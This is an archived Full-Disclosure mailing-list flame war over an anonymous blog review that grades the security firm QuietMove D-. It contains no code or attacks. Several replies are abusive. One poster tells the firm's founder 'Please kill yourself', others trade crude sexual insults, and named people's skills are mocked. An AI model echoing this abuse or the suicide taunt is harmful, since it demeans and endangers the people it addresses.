From adam.muntner at quietmove.com  Tue Jan  1 15:04:48 2008
From: adam.muntner at quietmove.com (Adam Muntner)
Date: Tue, 1 Jan 2008 10:04:48 -0500
Subject: [Full-disclosure] [Professional IT Security Providers -
	Exposed] QuietMove ( D - )
In-Reply-To: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com>
References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com>
Message-ID: <1B24AD54-11D8-44D5-8EB2-2A512C26C365@quietmove.com>

Your review gets a d-.

You can't add. You can't spell. Your skills appear to be limited to  
rudimentary use of a browser and linkedin.com. In combination with  
your undeserved and unearned sense of self importance, pretty pathetic.

You spelled Marcin's last name wrong. Great use of linkedin.com. You  
can't even cunt n paste. He interned for us last semester. He isn't a  
front line consultant. So,you fail the ^c ^v and spelling practical,  
as well as the investigative one. We have 2 other consultants besides  
myself-they don't use linkedin and you didnt find them. Our clients  
know our consultants. We don't post their names on the website.

F is for failure.

As for my experience - I was also a the security officer for an at the  
time publicly traded company for 2 years, the IT director of 2 .com  
startups where security was my responsibility for several years, and  
for the last 2 have been deeply involved with all customer engagements.
Prior to that I spent the 90s architecting, developing, and leading  
developer teams.
I hsve been pentesting since 98 and nearly nonstop since 2000. You  
were what, 11 years old then? Clearly, basic arithmetic isn't a strong  
point of yours, either. I suspect you spent the 90s in grammar school.  
At lest you seemed to learn something there.

On that note....

Most of our clients are referred by others who are very satisfied with  
the work we perform. Not by the website. It doesn't get a lot of  
attention - were small but growing and focused on serving our clients.  
I know basic HTML seems like the pinnacle of achievement to you, but  
we aren't in the business of making pretty web pages. We discuss our  
methodology with our clients-we don't post it on the web. I know you  
were hoping to learn nimething. Hacking for dummies might be more your  
speed, after you perfect your Cunt and Paste skills.

I took the plunge and started what is now a growing business nearly 2  
years ago, and we now serve 3 fortune 1000 clients, replacing much  
larger firms, plus a good number of midsize clients. Being an  
entrepreneur is a lot more challenging than being an anonymous  
anklebite, though from your moms basement it might not seem that way.

I'm heading to Manhattan for some R&R right now. If you are in the  
vicinity let me know, I'll buy you a beer (if you're 21) and you can  
meet me yourself and post a review or somthing.

Don't take this wrong - consider it constructive criticism and try  
harder next time. It's good to know we are recognized enough to be  
noticed by the mighty, anonymous secreview. This might even double our  
daily web traffic to 20 visitors. ;)

Adam Muntner
Managing Partner
QuietMove, Inc.
http://www.quietmove.com

Sent from my iPhone

On Dec 31, 2007, at 4:13 PM, secreview <secreview at hushmail.com> wrote:

> QuiteMove, located at http://www.quitemove.com is a small  
> Professional IT Security Services Provider that offers Training  
> services, Incident Response Services, Web Application Security  
> Services and Penetration Testing Services. QuiteMove was started by  
> Adam Munter in 2006 along with Jeffrey Rassas, and James Garvey, Jr.  
> You can read their mission statement here "http://www.mywikibiz.com/Directory:QuietMove 
> " (but its pretty basic).
>
> When reviewing the QuiteMove website and people we were not the  
> least bit impressed. The QuiteMove website is packed full of  
> grammatical errors and many of the services don't even have  
> descriptions. The services that do have descriptions are very poorly  
> written and very poorly defined. Take a look at their Penetration  
> Testing service offering as an example. If you want to see an  
> example of no content check out their Social Engineering offering.
>
> Since we were unable to extract anything useful from the materials  
> provided to us by QuiteMove we decided to focus on the talent behind  
> QuietMove. Unfortunately we were equally unimpressed. The only  
> technically oriented team members that we were able to identify  
> within QuietMove were Adam Munter, who is a founder and Marcin  
> Wielgoszewsk, who is a very "green" consultant. Seeing as Adam  
> Munter is being positioned as the technical visionary for QuietMove,  
> we decided to focus on him and not on Marcin.
>
> Adam's Linkedin Bio: http://tinyurl.com/yt9j2y
>
> As it turns out Adam Munter worked for Accuvant, a company that  
> competes directly with Adam's QuietMove; prior to founding  
> QuietMove. Adam's role at Accuvant was to lead consultants on IT  
> Security Engagements for large orginazations. In conjunction with  
> this, Adam also spoke at conferences. He worked here for 1 year and  
> 1 month.
>
> Prior to working for Accuvant, Adam worked for Pegasus Solutions  
> Inc. as the acting Chief Security Officer. Pegasus is the largest  
> hotel reservation distribution system vendor and a major vendor of  
> Hotel Management systems. Adam did get some Sarbanes Oxley work  
> under his belt as he helped Pegasus to successfully "marshall"  
> through their first audit. Adam also initiated the program to help  
> get Pegasus to be Visa CISP compliant, including evaluating and  
> changing their handling of payment Cardholder data. He worked here  
> for 2 years and 1 month.
>
> From August 2000 to January 2003 Adam was a "Founding member of  
> IBM's Ethical Hacking Center of Competency." His responsibilities  
> included being a technical interviewer for new hires, a Penetration  
> Testing Subject Matter Expert, and the performance of consulting  
> engagements for clients ranging from midsize companies and  
> government agencies to the fortune 500. Adam worked for IBM for 2  
> years and 6 months.
>
> So if we add up the relevant experience that Adam has had according  
> to his linked in bio we get 1 year and 1 month + 2 years and 6  
> months, which is a grand total of 3 years and 7 months of  
> professional IT Security Consulting Experience. Not sure about our  
> readers, but to us at Secreview that hardly makes Adam an IT  
> Security Expert.
>
> But wait, now we have a discrepancy...
>
> According to the QuietMove website, Adam "has over 14 years of  
> experience in information security, software, and product R&D with 8  
> years being dedicated solely to security." His QuietMove bio goes on  
> to say "Adam?s particular talents include penetration testing of web 
>  and binary applications, networks, systems, and SCADA, ?social engi 
> neering? and physical penetration of facilities, and in developing p 
> rofessional services offerings."
>
> This just doesn't add up.
>
> Anyway, remember we didn't set out to bash anyone here, but Adam/ 
> QuietMove put himself/themselves in the line of fire. QuietMove  
> appears to be a very small and disorganized shop. Their website is  
> half-assed and incomplete and we can't say anything better about  
> their talent profile. We suggest that QuietMove complete their  
> website and review their talent profile, then we'll set out to do  
> another review and see if they score better. As of right now, we  
> can't give them more than a D-. We'll keep an eye on their website  
> and redo this review if they ever fix their issues.
>
>
> Score Card (Click to Enlarge)
>
> --
> Posted By secreview to Professional IT Security Providers - Exposed  
> at 12/31/2007 11:32:00 AM
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080101/d7783f9a/attachment.html 

From adam.muntner at quietmove.com  Tue Jan  1 15:18:14 2008
From: adam.muntner at quietmove.com (Adam Muntner)
Date: Tue, 1 Jan 2008 10:18:14 -0500
Subject: [Full-disclosure] [Professional IT Security Providers -
	Exposed] QuietMove ( secreview review: D- )
In-Reply-To: <1B24AD54-11D8-44D5-8EB2-2A512C26C365@quietmove.com>
References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com>
	<1B24AD54-11D8-44D5-8EB2-2A512C26C365@quietmove.com>
Message-ID: <5506C1BC-5FE2-4C71-BBAB-FF7FFE176591@quietmove.com>

Before secreview jumps on them, apologies for the typos. Hard to type  
long email on touchscreen, on the train!

No hard feelings secreview. I apreciate the review. There is no such  
thing as bad press, and I had fun writing my witty and clever rejoinder.

Adam Muntner
Managing Partner
QuietMove, Inc.
Phone: 602-793-5969
Fax: 866-272-8194
http://www.quietmove.com

Sent from my iPhone

On Jan 1, 2008, at 10:04 AM, Adam Muntner <adam.muntner at quietmove.com>  
wrote:

> Your review gets a d-.
>
> You can't add. You can't spell. Your skills appear to be limited to  
> rudimentary use of a browser and linkedin.com. In combination with  
> your undeserved and unearned sense of self importance, pretty  
> pathetic.
>
> You spelled Marcin's last name wrong. Great use of linkedin.com. You  
> can't even cunt n paste. He interned for us last semester. He isn't  
> a front line consultant. So,you fail the ^c ^v and spelling  
> practical, as well as the investigative one. We have 2 other  
> consultants besides myself-they don't use linkedin and you didnt  
> find them. Our clients know our consultants. We don't post their  
> names on the website.
>
> F is for failure.
>
> As for my experience - I was also a the security officer for an at  
> the time publicly traded company for 2 years, the IT director of  
> 2 .com startups where security was my responsibility for several  
> years, and for the last 2 have been deeply involved with all  
> customer engagements.
> Prior to that I spent the 90s architecting, developing, and leading  
> developer teams.
> I hsve been pentesting since 98 and nearly nonstop since 2000. You  
> were what, 11 years old then? Clearly, basic arithmetic isn't a  
> strong point of yours, either. I suspect you spent the 90s in  
> grammar school. At lest you seemed to learn something there.
>
> On that note....
>
> Most of our clients are referred by others who are very satisfied  
> with the work we perform. Not by the website. It doesn't get a lot  
> of attention - were small but growing and focused on serving our  
> clients. I know basic HTML seems like the pinnacle of achievement to  
> you, but we aren't in the business of making pretty web pages. We  
> discuss our methodology with our clients-we don't post it on the  
> web. I know you were hoping to learn nimething. Hacking for dummies  
> might be more your speed, after you perfect your Cunt and Paste  
> skills.
>
> I took the plunge and started what is now a growing business nearly  
> 2 years ago, and we now serve 3 fortune 1000 clients, replacing much  
> larger firms, plus a good number of midsize clients. Being an  
> entrepreneur is a lot more challenging than being an anonymous  
> anklebite, though from your moms basement it might not seem that way.
>
> I'm heading to Manhattan for some R&R right now. If you are in the  
> vicinity let me know, I'll buy you a beer (if you're 21) and you can  
> meet me yourself and post a review or somthing.
>
> Don't take this wrong - consider it constructive criticism and try  
> harder next time. It's good to know we are recognized enough to be  
> noticed by the mighty, anonymous secreview. This might even double  
> our daily web traffic to 20 visitors. ;)
>
> Adam Muntner
> Managing Partner
> QuietMove, Inc.
> http://www.quietmove.com
>
> Sent from my iPhone
>
> On Dec 31, 2007, at 4:13 PM, secreview <secreview at hushmail.com> wrote:
>
>> QuiteMove, located at http://www.quitemove.com is a small  
>> Professional IT Security Services Provider that offers Training  
>> services, Incident Response Services, Web Application Security  
>> Services and Penetration Testing Services. QuiteMove was started by  
>> Adam Munter in 2006 along with Jeffrey Rassas, and James Garvey,  
>> Jr. You can read their mission statement here "http://www.mywikibiz.com/Directory:QuietMove 
>> " (but its pretty basic).
>>
>> When reviewing the QuiteMove website and people we were not the  
>> least bit impressed. The QuiteMove website is packed full of  
>> grammatical errors and many of the services don't even have  
>> descriptions. The services that do have descriptions are very  
>> poorly written and very poorly defined. Take a look at their  
>> Penetration Testing service offering as an example. If you want to  
>> see an example of no content check out their Social Engineering  
>> offering.
>>
>> Since we were unable to extract anything useful from the materials  
>> provided to us by QuiteMove we decided to focus on the talent  
>> behind QuietMove. Unfortunately we were equally unimpressed. The  
>> only technically oriented team members that we were able to  
>> identify within QuietMove were Adam Munter, who is a founder and  
>> Marcin Wielgoszewsk, who is a very "green" consultant. Seeing as  
>> Adam Munter is being positioned as the technical visionary for  
>> QuietMove, we decided to focus on him and not on Marcin.
>>
>> Adam's Linkedin Bio: http://tinyurl.com/yt9j2y
>>
>> As it turns out Adam Munter worked for Accuvant, a company that  
>> competes directly with Adam's QuietMove; prior to founding  
>> QuietMove. Adam's role at Accuvant was to lead consultants on IT  
>> Security Engagements for large orginazations. In conjunction with  
>> this, Adam also spoke at conferences. He worked here for 1 year and  
>> 1 month.
>>
>> Prior to working for Accuvant, Adam worked for Pegasus Solutions  
>> Inc. as the acting Chief Security Officer. Pegasus is the largest  
>> hotel reservation distribution system vendor and a major vendor of  
>> Hotel Management systems. Adam did get some Sarbanes Oxley work  
>> under his belt as he helped Pegasus to successfully "marshall"  
>> through their first audit. Adam also initiated the program to help  
>> get Pegasus to be Visa CISP compliant, including evaluating and  
>> changing their handling of payment Cardholder data. He worked here  
>> for 2 years and 1 month.
>>
>> From August 2000 to January 2003 Adam was a "Founding member of  
>> IBM's Ethical Hacking Center of Competency." His responsibilities  
>> included being a technical interviewer for new hires, a Penetration  
>> Testing Subject Matter Expert, and the performance of consulting  
>> engagements for clients ranging from midsize companies and  
>> government agencies to the fortune 500. Adam worked for IBM for 2  
>> years and 6 months.
>>
>> So if we add up the relevant experience that Adam has had according  
>> to his linked in bio we get 1 year and 1 month + 2 years and 6  
>> months, which is a grand total of 3 years and 7 months of  
>> professional IT Security Consulting Experience. Not sure about our  
>> readers, but to us at Secreview that hardly makes Adam an IT  
>> Security Expert.
>>
>> But wait, now we have a discrepancy...
>>
>> According to the QuietMove website, Adam "has over 14 years of  
>> experience in information security, software, and product R&D with  
>> 8 years being dedicated solely to security." His QuietMove bio goes  
>> on to say "Adam?s particular talents include penetration testing o 
>> f web and binary applications, networks, systems, and SCADA, ?soci 
>> al engineering? and physical penetration of facilities, and in dev 
>> eloping professional services offerings."
>>
>> This just doesn't add up.
>>
>> Anyway, remember we didn't set out to bash anyone here, but Adam/ 
>> QuietMove put himself/themselves in the line of fire. QuietMove  
>> appears to be a very small and disorganized shop. Their website is  
>> half-assed and incomplete and we can't say anything better about  
>> their talent profile. We suggest that QuietMove complete their  
>> website and review their talent profile, then we'll set out to do  
>> another review and see if they score better. As of right now, we  
>> can't give them more than a D-. We'll keep an eye on their website  
>> and redo this review if they ever fix their issues.
>>
>>
>> Score Card (Click to Enlarge)
>>
>> --
>> Posted By secreview to Professional IT Security Providers - Exposed  
>> at 12/31/2007 11:32:00 AM
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080101/74c50c00/attachment.html 

From marcinw86 at gmail.com  Tue Jan  1 16:57:36 2008
From: marcinw86 at gmail.com (Marcin Wielgoszewski)
Date: Tue, 01 Jan 2008 11:57:36 -0500
Subject: [Full-disclosure] [Professional IT Security Providers
	-	Exposed] QuietMove ( D - )
In-Reply-To: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com>
References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com>
Message-ID: <1199206656.15507.12.camel@thinker.ph.cox.net>

Marcin Wielgoszewski here, the "green consultant" you mentioned but
chose not to focus on.  I'm not sure what you mean by "green," but
whatever.  I have just finished my bachelor's degree, have done
internships with some Fortune-100's and I am constantly doing research
on my own.  I also make an effort to attend every conference and local
meet-up.  I have my own blog I started at http://www.tssci-security.com,
you can read and learn more about me.

Onto QuietMove and Adam Muntner...  QuietMove was founded by Adam and
the other two folks you mention.  I have done some part-time work with
Adam over the past couple months while finishing up my last semester.
Adam knows this industry inside-out, and one of only several people I
would say really knows his stuff.  I'm sorry the website doesn't have an
infosec glossary of terms for you to study for your Security+.  I guess
looking on LinkedIn and the website passes off as "research" nowadays.
Couldn't you have at least used Maltego to look deeper into this?  I was
actually going to make a post about how pathetic the "research" some
people have tried to pass off lately in security, and no one, except for
a few have called anyone out on it.

Some security consulting firms you would give a higher score are some of
the firms we've picked up where traceroute, whois and their nmap
scanners left off.



From adam.muntner at quietmove.com  Tue Jan  1 17:09:39 2008
From: adam.muntner at quietmove.com (Adam Muntner)
Date: Tue, 1 Jan 2008 12:09:39 -0500
Subject: [Full-disclosure] [Professional IT Security Providers
	-	Exposed] QuietMove ( D - )
In-Reply-To: <1199206656.15507.12.camel@thinker.ph.cox.net>
References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com>
	<1199206656.15507.12.camel@thinker.ph.cox.net>
Message-ID: <15924523-264D-4115-8B10-9A642E87145A@quietmove.com>

Secreview, you might learn something by reading Marcin's blog.


Adam Muntner
Managing Partner
QuietMove, Inc.
Fax: 866-272-8194
http://www.quietmove.com

Sent from my iPhone

On Jan 1, 2008, at 11:57 AM, Marcin Wielgoszewski  
<marcinw86 at gmail.com> wrote:

> Marcin Wielgoszewski here, the "green consultant" you mentioned but
> chose not to focus on.  I'm not sure what you mean by "green," but
> whatever.  I have just finished my bachelor's degree, have done
> internships with some Fortune-100's and I am constantly doing research
> on my own.  I also make an effort to attend every conference and local
> meet-up.  I have my own blog I started at http://www.tssci-security.com 
> ,
> you can read and learn more about me.
>
> Onto QuietMove and Adam Muntner...  QuietMove was founded by Adam and
> the other two folks you mention.  I have done some part-time work with
> Adam over the past couple months while finishing up my last semester.
> Adam knows this industry inside-out, and one of only several people I
> would say really knows his stuff.  I'm sorry the website doesn't  
> have an
> infosec glossary of terms for you to study for your Security+.  I  
> guess
> looking on LinkedIn and the website passes off as "research" nowadays.
> Couldn't you have at least used Maltego to look deeper into this?  I  
> was
> actually going to make a post about how pathetic the "research" some
> people have tried to pass off lately in security, and no one, except  
> for
> a few have called anyone out on it.
>
> Some security consulting firms you would give a higher score are  
> some of
> the firms we've picked up where traceroute, whois and their nmap
> scanners left off.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



From reepex at gmail.com  Tue Jan  1 18:12:51 2008
From: reepex at gmail.com (reepex)
Date: Tue, 1 Jan 2008 12:12:51 -0600
Subject: [Full-disclosure] [Professional IT Security Providers -
	Exposed] QuietMove ( D - )
In-Reply-To: <1B24AD54-11D8-44D5-8EB2-2A512C26C365@quietmove.com>
References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com>
	<1B24AD54-11D8-44D5-8EB2-2A512C26C365@quietmove.com>
Message-ID: <e9d9d4020801011012i2a8b5000o498cbcadb0b42c0f@mail.gmail.com>

On Jan 1, 2008 9:04 AM, Adam Muntner <adam.muntner at quietmove.com> wrote:

> I hsve been pentesting since 98 and nearly nonstop since 2000.
>

You cannot spell either and you have been a 'pentester' ... does this mean
you ran nessus and other automated testing tools and call yourself a hacker?


> Sent from my iPhone
>

Please kill yourself
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080101/64d25b09/attachment.html 

From silentrunner at hushmail.com  Tue Jan  1 18:05:10 2008
From: silentrunner at hushmail.com (SilentRunner)
Date: Tue, 01 Jan 2008 18:05:10 +0000
Subject: [Full-disclosure] [Professional IT Security Providers -
	Exposed] QuietMove ( D - )
Message-ID: <20080101180510.CB6851A0038@mailserver8.hushmail.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Adam

I appreciate that you have to defend your firm, but why are you
giving the skiddie the satisfaction of even acknowledging his
existence?

Don't be fooled by the "we", secreview is one person. A kid of
maybe 15 sitting in his room looking for something better to do
besides squeezing spots and masturbating to the demo dollies on the
shopping channel.

Not a single person here has had anything but derision for the
fool's efforts, none of which have added or will ever add anything
useful to the trade. I look forward to the day when he "reviews" a
big firm and they send the lawyers in to hopefully take his parents
(some people shouldn't be allowed to breed) house, and his computer
away.

If he is universally ignored, he will get bored and go away.
Perhaps with luck he will direct his reviewing "talents" to
something useful, like hairdressers, or cosmetics, where simply
reading a website has some relevance to the product, not.

SR



On Tue, 01 Jan 2008 15:04:48 +0000 Adam Muntner
<adam.muntner at quietmove.com> wrote:
>Your review gets a d-.
>
>You can't add. You can't spell. Your skills appear to be limited
>to
>rudimentary use of a browser and linkedin.com. In combination with

>
>your undeserved and unearned sense of self importance, pretty
>pathetic.
>
>You spelled Marcin's last name wrong. Great use of linkedin.com.
>You
>can't even cunt n paste. He interned for us last semester. He
>isn't a
>front line consultant. So,you fail the ^c ^v and spelling
>practical,
>as well as the investigative one. We have 2 other consultants
>besides
>myself-they don't use linkedin and you didnt find them. Our
>clients
>know our consultants. We don't post their names on the website.
>
>F is for failure.
>
>As for my experience - I was also a the security officer for an at

>the
>time publicly traded company for 2 years, the IT director of 2
>.com
>startups where security was my responsibility for several years,
>and
>for the last 2 have been deeply involved with all customer
>engagements.
>Prior to that I spent the 90s architecting, developing, and
>leading
>developer teams.
>I hsve been pentesting since 98 and nearly nonstop since 2000. You

>
>were what, 11 years old then? Clearly, basic arithmetic isn't a
>strong
>point of yours, either. I suspect you spent the 90s in grammar
>school.
>At lest you seemed to learn something there.
>
>On that note....
>
>Most of our clients are referred by others who are very satisfied
>with
>the work we perform. Not by the website. It doesn't get a lot of
>attention - were small but growing and focused on serving our
>clients.
>I know basic HTML seems like the pinnacle of achievement to you,
>but
>we aren't in the business of making pretty web pages. We discuss
>our
>methodology with our clients-we don't post it on the web. I know
>you
>were hoping to learn nimething. Hacking for dummies might be more
>your
>speed, after you perfect your Cunt and Paste skills.
>
>I took the plunge and started what is now a growing business
>nearly 2
>years ago, and we now serve 3 fortune 1000 clients, replacing much

>
>larger firms, plus a good number of midsize clients. Being an
>entrepreneur is a lot more challenging than being an anonymous
>anklebite, though from your moms basement it might not seem that
>way.
>
>I'm heading to Manhattan for some R&R right now. If you are in the

>
>vicinity let me know, I'll buy you a beer (if you're 21) and you
>can
>meet me yourself and post a review or somthing.
>
>Don't take this wrong - consider it constructive criticism and try

>
>harder next time. It's good to know we are recognized enough to be

>
>noticed by the mighty, anonymous secreview. This might even double

>our
>daily web traffic to 20 visitors. ;)
>
>Adam Muntner
>Managing Partner
>QuietMove, Inc.
>http://www.quietmove.com
>
>Sent from my iPhone
>
>On Dec 31, 2007, at 4:13 PM, secreview <secreview at hushmail.com>
>wrote:
>
>> QuiteMove, located at http://www.quitemove.com is a small
>> Professional IT Security Services Provider that offers Training

>
>> services, Incident Response Services, Web Application Security
>> Services and Penetration Testing Services. QuiteMove was started

>by
>> Adam Munter in 2006 along with Jeffrey Rassas, and James Garvey,

>Jr.
>> You can read their mission statement here
>"http://www.mywikibiz.com/Directory:QuietMove
>> " (but its pretty basic).
>>
>> When reviewing the QuiteMove website and people we were not the

>
>> least bit impressed. The QuiteMove website is packed full of
>> grammatical errors and many of the services don't even have
>> descriptions. The services that do have descriptions are very
>poorly
>> written and very poorly defined. Take a look at their
>Penetration
>> Testing service offering as an example. If you want to see an
>> example of no content check out their Social Engineering
>offering.
>>
>> Since we were unable to extract anything useful from the
>materials
>> provided to us by QuiteMove we decided to focus on the talent
>behind
>> QuietMove. Unfortunately we were equally unimpressed. The only
>> technically oriented team members that we were able to identify

>
>> within QuietMove were Adam Munter, who is a founder and Marcin
>> Wielgoszewsk, who is a very "green" consultant. Seeing as Adam
>> Munter is being positioned as the technical visionary for
>QuietMove,
>> we decided to focus on him and not on Marcin.
>>
>> Adam's Linkedin Bio: http://tinyurl.com/yt9j2y
>>
>> As it turns out Adam Munter worked for Accuvant, a company that

>
>> competes directly with Adam's QuietMove; prior to founding
>> QuietMove. Adam's role at Accuvant was to lead consultants on IT

>
>> Security Engagements for large orginazations. In conjunction
>with
>> this, Adam also spoke at conferences. He worked here for 1 year
>and
>> 1 month.
>>
>> Prior to working for Accuvant, Adam worked for Pegasus Solutions

>
>> Inc. as the acting Chief Security Officer. Pegasus is the
>largest
>> hotel reservation distribution system vendor and a major vendor
>of
>> Hotel Management systems. Adam did get some Sarbanes Oxley work

>
>> under his belt as he helped Pegasus to successfully "marshall"
>> through their first audit. Adam also initiated the program to
>help
>> get Pegasus to be Visa CISP compliant, including evaluating and

>
>> changing their handling of payment Cardholder data. He worked
>here
>> for 2 years and 1 month.
>>
>> From August 2000 to January 2003 Adam was a "Founding member of

>
>> IBM's Ethical Hacking Center of Competency." His
>responsibilities
>> included being a technical interviewer for new hires, a
>Penetration
>> Testing Subject Matter Expert, and the performance of consulting

>
>> engagements for clients ranging from midsize companies and
>> government agencies to the fortune 500. Adam worked for IBM for
>2
>> years and 6 months.
>>
>> So if we add up the relevant experience that Adam has had
>according
>> to his linked in bio we get 1 year and 1 month + 2 years and 6
>> months, which is a grand total of 3 years and 7 months of
>> professional IT Security Consulting Experience. Not sure about
>our
>> readers, but to us at Secreview that hardly makes Adam an IT
>> Security Expert.
>>
>> But wait, now we have a discrepancy...
>>
>> According to the QuietMove website, Adam "has over 14 years of
>> experience in information security, software, and product R&D
>with 8
>> years being dedicated solely to security." His QuietMove bio
>goes on
>> to say "Adam?s particular talents include penetration testing of

>web
>>  and binary applications, networks, systems, and SCADA, ?social
>engi
>> neering? and physical penetration of facilities, and in
>developing p
>> rofessional services offerings."
>>
>> This just doesn't add up.
>>
>> Anyway, remember we didn't set out to bash anyone here, but
>Adam/
>> QuietMove put himself/themselves in the line of fire. QuietMove

>
>> appears to be a very small and disorganized shop. Their website
>is
>> half-assed and incomplete and we can't say anything better about

>
>> their talent profile. We suggest that QuietMove complete their
>> website and review their talent profile, then we'll set out to
>do
>> another review and see if they score better. As of right now, we

>
>> can't give them more than a D-. We'll keep an eye on their
>website
>> and redo this review if they ever fix their issues.
>>
>>
>> Score Card (Click to Enlarge)
>>
>> --
>> Posted By secreview to Professional IT Security Providers -
>Exposed
>> at 12/31/2007 11:32:00 AM
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Charset: UTF8
Version: Hush 2.5

wpwEAQECAAYFAkd6gNYACgkQBGNKW24YMAeDsgP/WXrFSFiSws8FjqvKEUIjFa7l/FDf
CZMGF8DLNhJJJE5Wnix95G8+WEV7nWqwv9m20/xRfcDd9S9L3xSiRx5ljZTB5gJEXwxn
PqF9c0wd+lrQsjzuqwwUUbwvJN8nOfna0IQ+ZFElRGb+y++d8sxTty8Vf4G0DcsJycmO
WACPxgE=
=xFU2
-----END PGP SIGNATURE-----

--
Click here for huge discounts on tradeshow supplies.
http://tagline.hushmail.com/fc/Ioyw6h4eC7Vdiu1ZzArauAHTdGztWTfXZcO45Bc0E15vxeFbmmoc0w/



From reepex at gmail.com  Tue Jan  1 18:33:36 2008
From: reepex at gmail.com (reepex)
Date: Tue, 1 Jan 2008 12:33:36 -0600
Subject: [Full-disclosure] [Professional IT Security Providers -
	Exposed] QuietMove ( D - )
In-Reply-To: <1199206656.15507.12.camel@thinker.ph.cox.net>
References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com>
	<1199206656.15507.12.camel@thinker.ph.cox.net>
Message-ID: <e9d9d4020801011033h373d64edgf47c96f232e3de92@mail.gmail.com>

You are worthless.

http://www.tssci-security.com/bookshelf/

Is this list up to date?  It makes it seem as if you are learning basic
linux commands, sed, and basic perl. Also why are you reading operating
system design and implementation when you do not know C? ( Seeing as C books
are in your 'to-read' list ).  Do you understand any of the code in it or do
you just pick out buzz words to talk about at your 'local meet-ups'. Why
dont you explain the finer points of microkernel design to us?

You are headed even further down the path of complete lamer seeing as you
read books on XSS and all your blog posts revolve around it.

even more lulz in your 'plan to read' containing books on fuzzing,
metasploit, and writing rootkits. How can you write rootkits when you do not
know C and are learning basic unix commands?... lol

Hopefully one day you realize that you are just another security industry
kiddie and have no real knowledge, but probably not. Seeing as you have your
'bachelors' ( lol - has nothing to do with security ) - I am sure you are
well on your way to a cissp.

Also for good laugh speople should read:

http://www.tssci-security.com/projects/

how long did it take you to write all 40 lines of your 'labs' code? I shall
notify perl underground of your horrendous perl and you shalll be a source
of great lulz in their next production.

Just found this:
http://www.tssci-security.com/blog/wp-content/uploads/2007/11/mwielgoszewski_resume.pdfSo
you worked 4 places and did nothing useful. Sounds like SImon may want
to
hire you. ( Hi simon , are your workers still inadequate and you need more
help? )

So basically you have worked 4 jobs, went to a community college that has
some sort of security program, you know basic perl and C, do not know how to
audit any real programs, and blog about XSS.   Does this summarize you
pretty well?



On Jan 1, 2008 10:57 AM, Marcin Wielgoszewski <marcinw86 at gmail.com> wrote:

> Marcin Wielgoszewski here, the "green consultant" you mentioned but
> chose not to focus on.  I'm not sure what you mean by "green," but
> whatever.  I have just finished my bachelor's degree, have done
> internships with some Fortune-100's and I am constantly doing research
> on my own.  I also make an effort to attend every conference and local
> meet-up.  I have my own blog I started at http://www.tssci-security.com,
> you can read and learn more about me.
>
> Onto QuietMove and Adam Muntner...  QuietMove was founded by Adam and
> the other two folks you mention.  I have done some part-time work with
> Adam over the past couple months while finishing up my last semester.
> Adam knows this industry inside-out, and one of only several people I
> would say really knows his stuff.  I'm sorry the website doesn't have an
> infosec glossary of terms for you to study for your Security+.  I guess
> looking on LinkedIn and the website passes off as "research" nowadays.
> Couldn't you have at least used Maltego to look deeper into this?  I was
> actually going to make a post about how pathetic the "research" some
> people have tried to pass off lately in security, and no one, except for
> a few have called anyone out on it.
>
> Some security consulting firms you would give a higher score are some of
> the firms we've picked up where traceroute, whois and their nmap
> scanners left off.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080101/1847d7f7/attachment.html 

From lasveda at gmail.com  Tue Jan  1 18:47:25 2008
From: lasveda at gmail.com (veda)
Date: Tue, 01 Jan 2008 19:47:25 +0100
Subject: [Full-disclosure] [Professional IT Security Providers
 -	Exposed] QuietMove ( D - )
In-Reply-To: <e9d9d4020801011012i2a8b5000o498cbcadb0b42c0f@mail.gmail.com>
References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com>	<1B24AD54-11D8-44D5-8EB2-2A512C26C365@quietmove.com>
	<e9d9d4020801011012i2a8b5000o498cbcadb0b42c0f@mail.gmail.com>
Message-ID: <477A8ABD.7020701@gmail.com>

reepex wrote:
> On Jan 1, 2008 9:04 AM, Adam Muntner <adam.muntner at quietmove.com 
> <mailto:adam.muntner at quietmove.com>> wrote:
>
>     I hsve been pentesting since 98 and nearly nonstop since 2000.
>
>
> You cannot spell either and you have been a 'pentester' ... does this 
> mean you ran nessus and other automated testing tools and call 
> yourself a hacker?
>  
>
>     Sent from my iPhone
>
Cares?
>
> Please kill yourself
You all need to grow up a bit, and stfu.



From dentonj at gmail.com  Tue Jan  1 19:06:45 2008
From: dentonj at gmail.com (Jeffrey Denton)
Date: Tue, 1 Jan 2008 20:06:45 +0100
Subject: [Full-disclosure] [Professional IT Security Providers -
	Exposed] QuietMove ( D - )
In-Reply-To: <e9d9d4020801011033h373d64edgf47c96f232e3de92@mail.gmail.com>
References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com>
	<1199206656.15507.12.camel@thinker.ph.cox.net>
